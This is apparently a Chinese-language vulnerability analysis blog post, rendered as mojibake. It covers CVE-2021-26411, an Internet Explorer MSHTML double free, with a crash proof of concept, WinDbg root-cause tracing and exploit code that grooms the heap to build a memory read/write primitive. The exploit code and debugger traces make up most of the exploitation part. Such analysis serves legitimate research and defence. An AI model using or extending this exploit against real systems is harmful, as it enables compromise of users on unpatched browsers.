I"~Ñ<h1 id="æ¼æ´ä¿¡æ¯">æ¼æ´ä¿¡æ¯</h1>

<p>CVEï¼šCVE-2021-26411</p>

<p>IEç‰ˆæœ¬ï¼šIE 9-11</p>

<p>æ¼æ´ç±»å‹ï¼šDouble free</p>

<p>æ¼æ´æ¨¡å—ï¼šMSHTML.dll<!--more--></p>

<h1 id="æ¼æ´æˆå› ">æ¼æ´æˆå› </h1>

<p>POCï¼š</p>

<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
<span class="kd">var</span> <span class="nx">elem</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">xxx</span><span class="dl">'</span><span class="p">);</span> 
<span class="kd">var</span> <span class="nx">attr1</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createAttribute</span><span class="p">(</span><span class="dl">'</span><span class="s1">yyy</span><span class="dl">'</span><span class="p">);</span> 
<span class="kd">var</span> <span class="nx">attr2</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createAttribute</span><span class="p">(</span><span class="dl">'</span><span class="s1">zzz</span><span class="dl">'</span><span class="p">);</span> 

<span class="kd">var</span> <span class="nx">obj</span> <span class="o">=</span> <span class="p">{};</span>
<span class="nx">obj</span><span class="p">.</span><span class="nx">valueOf</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
	<span class="nx">elem</span><span class="p">.</span><span class="nx">clearAttributes</span><span class="p">();</span>
	<span class="k">return</span> <span class="mh">0x1337</span><span class="p">;</span>
<span class="p">};</span>

<span class="nx">attr1</span><span class="p">.</span><span class="nx">nodeValue</span> <span class="o">=</span> <span class="nx">obj</span><span class="p">;</span>
<span class="nx">attr2</span><span class="p">.</span><span class="nx">nodeValue</span> <span class="o">=</span> <span class="mi">123</span><span class="p">;</span>
<span class="nx">elem</span><span class="p">.</span><span class="nx">setAttributeNode</span><span class="p">(</span><span class="nx">attr1</span><span class="p">);</span>
<span class="nx">elem</span><span class="p">.</span><span class="nx">setAttributeNode</span><span class="p">(</span><span class="nx">attr2</span><span class="p">);</span>
<span class="nx">elem</span><span class="p">.</span><span class="nx">removeAttributeNode</span><span class="p">(</span><span class="nx">attr1</span><span class="p">);</span> 
<span class="o">&lt;</span><span class="sr">/script</span><span class="err">&gt;
</span></code></pre></div></div>

<p>åœ¨windbgä¸­è°ƒè¯•å‘ç°å´©æºƒäºCAttrValue::GetDISPIDä¸­ï¼Œæ ˆå›æº¯å‘ç°æ¼æ´å‘ç”Ÿäºie9_removeAttributeNodeInternalå‡½æ•°ä¸­ï¼Œäºæ˜¯é‡æ–°åœ¨æ­¤ä¸‹æ–­ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_9-44-45.png" alt="" /></p>

<p>æŸ¥çœ‹IDAåæ±‡ç¼–ä»£ç ï¼Œå‘ç°ä¼ å…¥6ä¸ªå‚æ•°ï¼Œè€ŒthisæŒ‡é’ˆæ˜¯é€šè¿‡ECXå¯„å­˜å™¨ä¼ é€’çš„ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-2-7_17-11-9.png" alt="" /></p>

<p>å› æ­¤ä¸‹æ–­åœ¨æ­¤ç›´æ¥æŸ¥çœ‹ecxçš„CElementç»“æ„ï¼ŒCElement+0x10å¤„ä¸ºCAttrArrayæ‰€åœ¨åœ°å€ï¼ŒCAttrArrayå†…å­˜å‚¨äº†5ä¸ªCAttrValueç»“æ„ï¼Œè¯¥ç»“æ„æŒ‡å‘çš„æ­£æ˜¯elemã€attr1 å’Œattr2ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_10-36-25.png" alt="" /></p>

<p>æ¥ç€é€šè¿‡è°ƒç”¨ä¸¤æ¬¡CBase::FindAAIndexNSå‡½æ•°è·å–äº†attr1å’Œattr1.ValueOfåœ¨CAttrArrayä¸­çš„åºå·ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_10-56-15.png" alt="" /></p>

<p>å°†è·å–åˆ°çš„CAttr[1]çš„åºå·å’ŒvtTypeä¼ å…¥GetObjectAtå‡½æ•°è·å–CAttr[1]ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_14-9-52.png" alt="" /></p>

<p>æ¥ç€è°ƒç”¨GetIntoBSTRAtå°†CAttr[1].ValueOfè½¬åŒ–ä¸ºBSTRï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_14-12-14.png" alt="" /></p>

<p>æ‰§è¡Œå®ŒåæŸ¥çœ‹CAttrArrayå‘ç°elemä¸­å…¨éƒ¨è¢«attr2è¦†ç›–ï¼Œè¯´æ˜åœ¨GetIntoBSTRAtå‡½æ•°å†…æ‰§è¡Œäº†attr1çš„å›è°ƒå‡½æ•°ï¼Œè°ƒç”¨äº†clearAttributeså°†elemå†…çš„Attrå¯¹è±¡å…¨éƒ¨é‡Šæ”¾ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_12-1-37.png" alt="" /></p>

<p>è·Ÿè¿›è°ƒè¯•å‘ç°GetIntoBSTRAtå†…è°ƒç”¨äº†JavascriptDispatch::InvokeOnSelfï¼Œæœ€ç»ˆè°ƒç”¨CElement::clearAttributesæŠŠattr1å’Œattr2æ¸…é™¤ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_14-17-52.png" alt="" /></p>

<p>æ‰§è¡Œå®Œå›è°ƒå‡½æ•°åä¼šæ¥ç€æ‰§è¡ŒCAttrArray::Destroyæ¥é‡Šæ”¾attr1ï¼Œä½†æ˜¯æ­¤æ—¶CAttrArrayæ•°ç»„ä¸­è¢«attr2è¦†ç›–ï¼Œæ‰§è¡Œå®Œæ¯•åattr2ä»å†…å­˜ä¸­é‡Šæ”¾ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_15-20-43.png" alt="" /></p>

<p>å½“æ‰§è¡Œåˆ°CBase::FindAAIndexNSæ—¶ï¼ŒAttr2å·²ç»è¢«é‡Šæ”¾ï¼Œè·å–Indexæ—¶å‡ºé”™è¿”å›-1ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_15-23-31.png" alt="" /></p>

<p>å› æ­¤åœ¨æ‰§è¡Œä¸‹ä¸€ä¸ªCAttrArray::Destroyæ—¶è§¦å‘Double Freeï¼Œä¼šå°†-1å½“ä½œIndexé‡Šæ”¾CAttr[-1]çš„å¯¹è±¡ï¼Œè·å–äº†ä¸€ä¸ªéæ³•çš„å¯¹è±¡ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image2022-1-26_15-36-29.png" alt="" /></p>

<p>å› æ­¤ï¼Œè¦æƒ³æ„é€ è¯»å†™åŸè¯­éœ€è¦å ç”¨è¢«é‡Šæ”¾åçš„attr2çš„å†…å­˜ç©ºé—´ï¼ŒåŒæ—¶éœ€è¦å‘elemä¸­æ·»åŠ Attributeé¿å…CBase::FindAAIndexNSè·å–åˆ°éæ³•çš„ä¸‹æ ‡ã€‚</p>

<h1 id="æ¼æ´åˆ©ç”¨">æ¼æ´åˆ©ç”¨</h1>

<h2 id="æ„é€ è¯»å†™åŸè¯­">æ„é€ è¯»å†™åŸè¯­</h2>

<p>æ„é€ è¯»å†™åŸè¯­éƒ¨åˆ†EXPå¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function pad0(str) {
    return ('0000' + str).slice(-4)
}

function alloc1() {
    var view = new DataView(abf)
    var str = ''
    for (var i = 4; i &lt; abf.byteLength - 2; i += 2)
        str += '%u' + pad0(view.getUint16(i, true).toString(16))
    var result = document.createAttribute('alloc')
    result.nodeValue = unescape(str)
    return result
}

function alloc2() {
    var dic1 = new ActiveXObject('Scripting.Dictionary')
    var dic2 = new ActiveXObject('Scripting.Dictionary')
    dic2.add(0, 1)
    dic1.add(0, dic2.items())
    dic1.add(1, fake)
    dic1.add(2, arr)
    for (i = 3; i &lt; 0x20010 / 0x10; ++i)
        dic1.add(i, 0x12341234)
    return dic1.items()
}

var god
var arr = [{}]
var fake = new ArrayBuffer(0x100)	//ä¼ªé€ çš„write-what-whereè¯»å†™åŸè¯­
var abf = new ArrayBuffer(0x20010)	
var alloc = alloc2()				//æ›¿æ¢ArrayBufferçš„Scripting.Dictionaryå¯¹è±¡ç»“æ„
var hd0 = document.createAttribute('handle')
var hd1 = document.createAttribute('handle')
var hd2
var ele = document.createElement('element')		//elementå¯¹è±¡ï¼Œå†…æœ‰attributeå›è°ƒå‡½æ•°å’Œattrå­—ç¬¦ä¸²æ•°ç»„
var att = document.createAttribute('attribute')
att.nodeValue = {
    valueOf: function() {
        hd1.nodeValue = (new alloc1()).nodeValue
        ele.clearAttributes()
        hd2 = hd1.cloneNode()					//æ‰§è¡Œå®Œè¯¥è¯­å¥ï¼Œattrå­—ç¬¦ä¸²å·²ç»è¢«æ›¿æ¢ä¸ºArrayBuffer abf
        ele.setAttribute('attribute', 1337)		//æ‰§è¡Œè¯¥è¯­å¥æ˜¯ä¸ºäº†è®©CBase::FindAAIndexNSè·å–åˆ°æ­£ç¡®çš„ä¸‹æ ‡ï¼Œå¯¼è‡´è¢«æ›¿æ¢åçš„attrå†æ¬¡è¢«é‡Šæ”¾
    }
}
ele.setAttributeNode(att)
ele.setAttribute('attr', '0'.repeat((0x20010 - 6) / 2))
ele.removeAttributeNode(att)	//æ‰§è¡Œè¯¥è¯­å¥ï¼Œé¦–å…ˆä¼šæ‰§è¡Œattributeå›è°ƒå‡½æ•°ï¼Œæ¥ç€æ‰§è¡ŒremoveAttributeNode
hd0.nodeValue = alloc			//éšåå°†è¢«é‡Šæ”¾çš„attræ›¿æ¢ä¸ºdic1.items
</code></pre></div></div>

<p>ä¸‹æ–­åœ¨jscript9!Js::JavascriptArrayBuffer::Createï¼Œæ‰§è¡Œå®Œæ¯•åæŸ¥çœ‹ArrayBufferï¼šfakeå’Œabfçš„ç»“æ„ï¼Œè·å¾—fakeå’Œabfçš„å†…å­˜å¸ƒå±€ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:020&gt; bp jscript9!Js::JavascriptArrayBuffer::Create
breakpoint 0 redefined
0:020&gt; g
Breakpoint 0 hit
eax=00000100 ebx=095b4bc0 ecx=00000100 edx=08dcc8c0 esi=05d46568 edi=05d46568
eip=737893d0 esp=05cec964 ebp=05cec980 iopl=0         nv up ei pl nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000207
jscript9!Js::JavascriptArrayBuffer::Create:	 	//var fake = new ArrayBuffer(0x100)	
737893d0 8bff            mov     edi,edi
0:009&gt; gu
eax=0963fed0 ebx=095b4bc0 ecx=00000000 edx=00000078 esi=05d46568 edi=05d46568
eip=739b7f03 esp=05cec968 ebp=05cec980 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
jscript9!Js::ArrayBuffer::NewInstance+0xb3:
739b7f03 5f              pop     edi
0:009&gt; dpp eax L9			//fakeçš„ArrayBufferç»“æ„
0963fed0  7370514c 7378ac10 jscript9!Js::JavascriptArrayBuffer::Finalize
0963fed4  08dcc8c0 00000020
0963fed8  00000000
0963fedc  00000000
0963fee0  00000000
0963fee4  00000000
0963fee8  00000000
0963feec  05d4d338 00000000	//+0x1cä¸ºBufferæ‰€åœ¨åœ°å€
0963fef0  00000100			//+0x20ä¸ºBufferLenth
0:009&gt; g
Breakpoint 0 hit
eax=00020010 ebx=095b4bc0 ecx=00020010 edx=08dcc8c0 esi=05d46568 edi=05d46568
eip=737893d0 esp=05cec964 ebp=05cec980 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000203
jscript9!Js::JavascriptArrayBuffer::Create:	 //var abf = new ArrayBuffer(0x20010)
737893d0 8bff            mov     edi,edi
0:009&gt; gu
eax=0963ff00 ebx=095b4bc0 ecx=00000000 edx=00000008 esi=05d46568 edi=05d46568
eip=739b7f03 esp=05cec968 ebp=05cec980 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
jscript9!Js::ArrayBuffer::NewInstance+0xb3:
739b7f03 5f              pop     edi
0:009&gt; dpp eax L9	 		//abfçš„ArrayBufferç»“æ„
0963ff00  7370514c 7378ac10 jscript9!Js::JavascriptArrayBuffer::Finalize
0963ff04  08dcc8c0 00000020
0963ff08  00000000
0963ff0c  00000000
0963ff10  00000000
0963ff14  00000000
0963ff18  00000000
0963ff1c  05d61fe8 00000000 //+0x1cä¸ºBufferæ‰€åœ¨åœ°å€
0963ff20  00020010		 	//+0x20ä¸ºBufferLenth
</code></pre></div></div>

<p>æ­¤æ—¶åœ¨Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18bå¤„ä¸‹æ–­ï¼Œè¯¥å‡½æ•°ä¸ºå¯¹è±¡å‡½æ•°è°ƒç”¨å¤„ï¼Œå¯ä»¥çœ‹åˆ°hd0ï¼Œhd1å’Œeleåœ¨å†…å­˜ä¸­çš„å¸ƒå±€ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; bp Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b
0:009&gt; g
Breakpoint 0 hit
eax=0e407f58 ebx=00ebd201 ecx=7203fac0 edx=01000100 esi=02000002 edi=00000002
eip=73869e6b esp=05cec978 ebp=05cec9e0 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec9c8={MSHTML!CFastDOM::CDocument::Trampoline_createAttribute (7203fac0)}	//var hd0 = document.createAttribute('handle')
0:009&gt; p
eax=0a2f9cf0 ebx=00ebd201 ecx=73783070 edx=41004000 esi=02000002 edi=00000002
eip=73869e6e esp=05cec978 ebp=05cec9e0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec9b4=05cec98c
0:009&gt; dd poi(eax+18) L10	//hd0
05387200  715961ec 00000001 00000001 00000008
05387210  00000000 00000000 0a2f9cf0 00000000
05387220  ffffffff 093b32c4 00000008 00000000
05387230  00000000 00000000 05382370 00000000
0:009&gt; du 093b32c4 
093b32c4  "handle"
0:009&gt; g
Breakpoint 0 hit
eax=0e407f58 ebx=00ebd201 ecx=7203fac0 edx=01000100 esi=02000002 edi=00000002
eip=73869e6b esp=05cec978 ebp=05cec9e0 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec9c8={MSHTML!CFastDOM::CDocument::Trampoline_createAttribute (7203fac0)}	//var hd1 = document.createAttribute('handle')
0:009&gt; p
eax=0a2f9d20 ebx=00ebd201 ecx=73783070 edx=41004000 esi=02000002 edi=00000002
eip=73869e6e esp=05cec978 ebp=05cec9e0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec9b4=05cec98c
0:009&gt; dd poi(eax+18) L10	//hd1
05387260  715961ec 00000001 00000001 00000008
05387270  00000000 00000000 0a2f9d20 00000000
05387280  ffffffff 093b31e4 00000008 00000000
05387290  00000000 00000000 05382370 00000000
0:009&gt; du 093b31e4 
093b31e4  "handle"
0:009&gt; g
Breakpoint 0 hit
eax=0e408092 ebx=00ebd201 ecx=72040490 edx=00040000 esi=02000002 edi=00000002
eip=73869e6b esp=05cec978 ebp=05cec9e0 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec9c8={MSHTML!CFastDOM::CDocument::Trampoline_createElement (72040490)}	//var ele = document.createElement('element')
0:009&gt; p
eax=0a2f9d50 ebx=00ebd201 ecx=73783070 edx=41004000 esi=02000002 edi=00000002
eip=73869e6e esp=05cec978 ebp=05cec9e0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec9b4=05cec98c
0:009&gt; dd poi(eax+18) L8	//ele
05382b40  715f5670 00000001 00000001 00000008
05382b50  05378a70 00000000 0a2f9d50 00000000
0:009&gt; dd 05378a70 L4		//CAttrArray
05378a70  00000010 00000001 0541f580 00000000
0:009&gt; dd 0541f580 L1*4		//CAtrrValue
0541f580  80000d04 8001141f 05384bc0 05cec4dc
0:009&gt; du poi(05384bc0+8)
093b2fc4  "element"
</code></pre></div></div>

<p>å½“æ‰§è¡Œåˆ°removeAttributeNodeæ—¶ï¼Œeleå†…å·²ç»å­˜æ”¾äº†attributeå›è°ƒå‡½æ•°å’Œattrå­—ç¬¦ä¸²æ•°ç»„ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e409f2c ebx=00ebd201 ecx=7204f960 edx=00001000 esi=10000002 edi=00000002
eip=73869e6b esp=05cec978 ebp=05cec9e0 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec9c8={MSHTML!CFastDOM::CElement::Trampoline_removeAttributeNode (7204f960)}	//ele.removeAttributeNode(att)
0:009&gt; dd 05382b40 L8
05382b40  715f5670 00000001 00000001 00000010
05382b50  05378a70 00000000 0a2f9d50 00000000
0:009&gt; dd 05378a70 L4
05378a70  00000010 00000004 0541f580 08954440
0:009&gt; dd 0541f580 L4*4
0541f580  80000d04 8001141f 05384bc0 05cec4dc	//elemengt
0541f590  80000901 002dc6c1 09649b84 00000020	//attribute.nodeValue
0541f5a0  80000d09 002dc6c1 053872c0 05cec824	//attribute
0541f5b0  80000801 002dc6c2 0943b5b4 00000020	//attr
0:009&gt; du poi(053872c0+24) 
093b3284  "attribute"
0:009&gt; dd 0943b5b4-4	//attr
0943b5b0  0002000a 00300030 00300030 00300030
0943b5c0  00300030 00300030 00300030 00300030
0943b5d0  00300030 00300030 00300030 00300030
0943b5e0  00300030 00300030 00300030 00300030
0943b5f0  00300030 00300030 00300030 00300030
0943b600  00300030 00300030 00300030 00300030
0943b610  00300030 00300030 00300030 00300030
0943b620  00300030 00300030 00300030 00300030
</code></pre></div></div>

<p>æ¥ç€åœ¨æ‰§è¡ŒremoveAttributeNodeæ—¶ï¼Œä¼šè°ƒç”¨attçš„å›è°ƒå‡½æ•°ï¼Œæ‰§è¡Œå‡½æ•°alloc1()ï¼Œå°†ArrayBufferï¼šabfå¤åˆ¶åˆ°hd1.nodeValueï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e407f58 ebx=00ebd201 ecx=7203fac0 edx=01000100 esi=02000002 edi=00000002
eip=73869e6b esp=05cec068 ebp=05cec0d0 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec0b8={MSHTML!CFastDOM::CDocument::Trampoline_createAttribute (7203fac0)}	//var result = document.createAttribute('alloc')
0:009&gt; g
Breakpoint 0 hit
eax=0e411fda ebx=00ebd201 ecx=7208fed0 edx=04001000 esi=02000002 edi=00000002
eip=73869e6b esp=05cebfc0 ebp=05cec024 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec00c={MSHTML!CFastDOM::CNode::Trampoline_Set_nodeValue (7208fed0)}	//result.nodeValue = unescape(str)
0:009&gt; g
Breakpoint 0 hit
eax=0e40dd64 ebx=00ebd201 ecx=7206eb20 edx=40000010 esi=02000001 edi=00000001
eip=73869e6b esp=05cec1d8 ebp=05cec23c iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec224={MSHTML!CFastDOM::CNode::Trampoline_Get_nodeValue (7206eb20)}
0:009&gt; g
Breakpoint 0 hit
eax=0e411fda ebx=00ebd201 ecx=7208fed0 edx=04001000 esi=02000002 edi=00000002
eip=73869e6b esp=05cec230 ebp=05cec294 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec27c={MSHTML!CFastDOM::CNode::Trampoline_Set_nodeValue (7208fed0)}	//hd1.nodeValue = (new alloc1()).nodeValue
0:009&gt; dd 05387260 L10	//hd1ï¼Œæ­¤æ—¶hd1.nodeValueè¿˜æœªèµ‹å€¼
05387260  715961ec 00000001 00000001 00000008
05387270  00000000 00000000 0a2f9d20 00000000
05387280  ffffffff 093b31e4 00000008 00000000
05387290  00000000 00000000 05382370 00000000
0:009&gt; p
eax=00000000 ebx=00ebd201 ecx=73783070 edx=41004000 esi=02000002 edi=00000002
eip=73869e6e esp=05cec230 ebp=05cec294 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec268=05cec240
0:009&gt; dd 05387260 L10	//hd1
05387260  715961ec 00000001 00000001 00000008
05387270  00000000 00000000 0a2f9d20 00000000
05387280  ffffffff 093b31e4 00000008 00000000
05387290  094a200c 00000000 05382370 00000000
0:009&gt; dd 094a200c-4	//abfå·²ç»å¤åˆ¶åˆ°äº†hd1.nodeValue
094a2008  0002000a 00000000 00000000 00000000
094a2018  00000000 00000000 00000000 00000000
094a2028  00000000 00000000 00000000 00000000
094a2038  00000000 00000000 00000000 00000000
094a2048  00000000 00000000 00000000 00000000
094a2058  00000000 00000000 00000000 00000000
094a2068  00000000 00000000 00000000 00000000
094a2078  00000000 00000000 00000000 00000000
</code></pre></div></div>

<p>æ‰§è¡Œå®Œæ¯•clearAttributesåï¼Œeleå†…çš„å…ƒç´ è¢«æ¸…é™¤ï¼Œattræ‰€å ç”¨çš„å†…å­˜ç©ºé—´ä¹Ÿä¼šè¢«æ¸…ç†ï¼Œå½“æ‰§è¡Œå®Œhd1.cloneNode()åï¼Œattræ‰€å ç”¨çš„å†…å­˜ç©ºé—´å˜æˆäº†hd1.nodeValueï¼Œæ­¤æ—¶è·å¾—äº†hd2.nodeValueè¿™ä¸ª0x20100å¤§å°çš„è¯»å†™åŸè¯­ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:009&gt; g
Breakpoint 0 hit
eax=0e407d10 ebx=00ebd201 ecx=7203e880 edx=40010004 esi=10000001 edi=00000001
eip=73869e6b esp=05cec2e0 ebp=05cec340 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec328={MSHTML!CFastDOM::CHTMLElement::Trampoline_clearAttributes (7203e880)}	//ele.clearAttributes()
0:009&gt; dd 05378a70 L4
05378a70  00000010 00000004 0541f580 08954440
0:009&gt; dd 0541f580 L4*4		//æ­¤æ—¶CAtträ¸­çš„å…ƒç´ è¿˜æœªè¢«æ¸…é™¤
0541f580  80000d04 8001141f 05384bc0 05cec4dc
0541f590  80000901 002dc6c1 09649b84 00000020
0541f5a0  80000d09 002dc6c1 053872c0 05cec824
0541f5b0  80000801 002dc6c2 0943b5b4 00000020
0:009&gt; dd 0943b5b4-4		//attræ‰€åœ¨å†…å­˜ä¹Ÿæœªè¢«æ¸…é™¤
0943b5b0  0002000a 00300030 00300030 00300030
0943b5c0  00300030 00300030 00300030 00300030
0943b5d0  00300030 00300030 00300030 00300030
0943b5e0  00300030 00300030 00300030 00300030
0943b5f0  00300030 00300030 00300030 00300030
0943b600  00300030 00300030 00300030 00300030
0943b610  00300030 00300030 00300030 00300030
0943b620  00300030 00300030 00300030 00300030
0:009&gt; p
eax=00000000 ebx=00ebd201 ecx=73783070 edx=41004000 esi=10000001 edi=00000001
eip=73869e6e esp=05cec2e0 ebp=05cec340 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec314=05cec2ec
0:009&gt; dd 0541f580 L4*4		//æ‰§è¡Œå®Œæ¯•åï¼ŒCAtträ¸­çš„å…ƒç´ è¢«æ¸…é™¤
0541f580  80000d04 8001141f 05384bc0 05cec4dc
0541f590  80000801 002dc6c2 0943b5b4 00000020
0541f5a0  80000801 002dc6c2 0943b5b4 00000020
0541f5b0  80000801 002dc6c2 0943b5b4 00000020
0:009&gt; dd 0943b5b4-4		//attræ‰€åœ¨å†…å­˜ä¹Ÿè¢«æ¸…ç†ï¼Œä¸ºç©ºé—²çŠ¶æ€
0943b5b0  09461fd8 093ff588 00300030 00300030
0943b5c0  00300030 00300030 00300030 00300030
0943b5d0  00300030 00300030 00300030 00300030
0943b5e0  00300030 00300030 00300030 00300030
0943b5f0  00300030 00300030 00300030 00300030
0943b600  00300030 00300030 00300030 00300030
0943b610  00300030 00300030 00300030 00300030
0943b620  00300030 00300030 00300030 00300030
0:009&gt; g
Breakpoint 0 hit
eax=0e413ed6 ebx=00ebd201 ecx=7209f6b0 edx=00400040 esi=02000001 edi=00000001
eip=73869e6b esp=05cec2e0 ebp=05cec340 iopl=0         nv up ei pl zr na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200247
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18b:
73869e6b ff55e8          call    dword ptr [ebp-18h]  ss:002b:05cec328={MSHTML!CFastDOM::CNode::Trampoline_cloneNode (7209f6b0)}	//hd2 = hd1.cloneNode()
0:009&gt; p
eax=0c565000 ebx=00ebd201 ecx=73783070 edx=41004000 esi=02000001 edi=00000001
eip=73869e6e esp=05cec2e0 ebp=05cec340 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00200246
jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x18e:
73869e6e 8b65d4          mov     esp,dword ptr [ebp-2Ch] ss:002b:05cec314=05cec2ec
0:009&gt; dd 0943b5b4-4		//attræ‰€å ç”¨çš„å†…å­˜ç©ºé—´å˜æˆäº†hd1.nodeValue
0943b5b0  0002000a 00000000 00000000 00000000
0943b5c0  00000000 00000000 00000000 00000000
0943b5d0  00000000 00000000 00000000 00000000
0943b5e0  00000000 00000000 00000000 00000000
0943b5f0  00000000 00000000 00000000 00000000
0943b600  00000000 00000000 00000000 00000000
0943b610  00000000 00000000 00000000 00000000
0943b620  00000000 00000000 00000000 00000000
</code></pre></div></div>

